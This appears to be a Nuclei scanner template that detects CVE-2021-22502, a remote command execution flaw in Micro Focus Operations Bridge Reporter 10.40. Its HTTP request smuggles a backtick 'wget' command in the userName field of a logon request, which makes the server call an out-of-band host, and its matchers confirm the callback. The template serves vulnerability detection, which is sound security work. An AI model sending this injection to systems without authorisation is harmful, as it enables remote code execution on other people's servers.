id: CVE-2021-22502 info: name: Micro Focus Operations Bridge Reporter - Remote Code Execution author: pikpikcu severity: critical description: | Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. remediation: | Apply the latest security patches or updates provided by Micro Focus to mitigate this vulnerability. reference: - https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md - https://softwaresupport.softwaregrp.com/doc/KM03775947 - https://www.zerodayinitiative.com/advisories/ZDI-21-153/ - https://nvd.nist.gov/vuln/detail/CVE-2021-22502 - https://www.zerodayinitiative.com/advisories/ZDI-21-154/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-22502 cwe-id: CWE-78 epss-score: 0.96129 epss-percentile: 0.99362 cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microfocus product: operation_bridge_reporter tags: cve,cve2021,microfocus,obr,rce,kev http: - raw: - | POST /AdminService/urest/v1/LogonResource HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"userName":"something `wget {{interactsh-url}}`","credential":"whatever"} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - "dns" - type: word part: body words: - "An error occurred" - "AUTHENTICATION_FAILED" condition: and - type: word part: header words: - "application/json" - type: status status: - 401 # digest: 490a0046304402200a8719b1f759f8855fd08690c41415c98f819e2c91cf9e52b6d9837ba1a2c11502206c7d2124dd7c1b36a4d45c563a91ecdf064513dc091c797966d91a25978fa047:922c64590222798bb761d5b6d8e72950